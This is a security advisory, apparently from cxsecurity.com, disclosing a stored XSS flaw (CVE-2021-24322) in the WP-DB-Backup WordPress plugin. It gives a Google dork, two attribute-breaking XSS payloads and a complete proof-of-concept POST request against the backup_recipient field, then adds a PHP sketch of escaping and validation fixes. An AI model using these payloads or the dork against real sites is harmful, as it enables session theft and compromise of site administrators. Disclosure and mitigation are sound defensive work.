WP-DB-Backup WordPress Plugin <= 2.3.3 - Authenticated Persistent XSS

2021.05.17
m0ze (RU)
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

/*!
- # VULNERABILITY: WP-DB-Backup WordPress Plugin <= 2.3.3 - Authenticated Persistent XSS
- # GOOGLE DORK: inurl:/wp-content/plugins/wp-db-backup/
- # DATE: 2021-04-04
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Austin Matzko [ http://austinmatzko.com ]
- # SOFTWARE VERSION: <= 2.3.3
- # SOFTWARE LINK: https://wordpress.org/plugins/wp-db-backup/
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C
- # CWE: CWE-79
- # CVE: CVE-2021-24322
*/

### -- [ Info: ]
[i] An Authenticated Persistent XSS vulnerability was discovered in the WP-DB-Backup plugin through v2.3.3 for WordPress.
[i] Vulnerable parameter(s): &backup_recipient=.

### -- [ Impact: ]
[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.

### -- [ Payloads: ]
[$] " autofocus onfocus=alert(document.cookie); "
[$] " autofocus onfocus=alert(document.domain); "

### -- [ PoC | Authenticated Persistent XSS | Email backup to: ]
[!] POST /wp-admin/tools.php?page=wp-db-backup HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 602
Cookie: [admin cookies]

_wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Ftools.php%3Fpage%3Dwp-db-backup&core_tables%5B%5D=wp_commentmeta&core_tables%5B%5D=wp_comments&core_tables%5B%5D=wp_links&core_tables%5B%5D=wp_options&core_tables%5B%5D=wp_postmeta&core_tables%5B%5D=wp_posts&core_tables%5B%5D=wp_term_relationships&core_tables%5B%5D=wp_term_taxonomy&core_tables%5B%5D=wp_terms&core_tables%5B%5D=wp_usermeta&core_tables%5B%5D=wp_users&deliver=smtp&backup_recipient=m0ze%40example.com%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&do_backup=fragments&submit=Backup+now%21

### -- [ Contacts: ]
[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze

References:

https://m0ze.ru/vulnerability/%5B2021-04-04%5D-%5BWordPress%5D-%5BCWE-79%5D-WP-DB-Backup-WordPress-Plugin-v2.3.3.txt
https://twitter.com/vladm0ze
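
Mitigation sketch for the backup_recipient issue described above. This is an added example, not the plugin's code and not part of the original advisory. It assumes (the advisory does not show the source) that the stored recipient is echoed back into the value attribute of a text input; the function names are hypothetical, and plain PHP calls stand in for the WordPress helpers named in the comments.

```php
<?php
// Added example, not the plugin's code. Assumption: the saved recipient is
// written back into value="..." of an <input> on the plugin's admin page.

// Constructed sample: the URL-decoded backup_recipient value from the PoC.
$recipient = 'm0ze@example.com" autofocus onfocus=alert(document.cookie); "';

// Unsafe pattern (hypothetical): raw interpolation. The double quote in the
// stored value closes the attribute, so the remainder is parsed as further
// attributes of the <input> element.
function render_unsafe(string $value): string {
    return '<input type="text" name="backup_recipient" value="' . $value . '" />';
}

// Output fix: encode for an HTML attribute context every time the value is
// rendered. In WordPress the equivalent call is esc_attr().
function render_safe(string $value): string {
    $encoded = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="backup_recipient" value="' . $encoded . '" />';
}

// Input fix: store the recipient only if it is a single valid e-mail address.
// In WordPress the equivalents are is_email() and sanitize_email().
function validate_recipient(string $value): ?string {
    $checked = filter_var(trim($value), FILTER_VALIDATE_EMAIL);
    return $checked === false ? null : $checked;
}

// Compare the two renderings of the same stored value.
echo "unsafe: ", render_unsafe($recipient), PHP_EOL;
echo "safe:   ", render_safe($recipient), PHP_EOL;

// Validate before storage: the PoC value versus a constructed benign address.
foreach ([$recipient, 'admin@example.com'] as $candidate) {
    $result = validate_recipient($candidate);
    echo ($result === null ? "rejected: " : "accepted: "), $candidate, PHP_EOL;
}
```

Validation on save and encoding on output are complementary: encoding also covers values that were stored before the validation was added.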



Copyright 2021, cxsecurity.com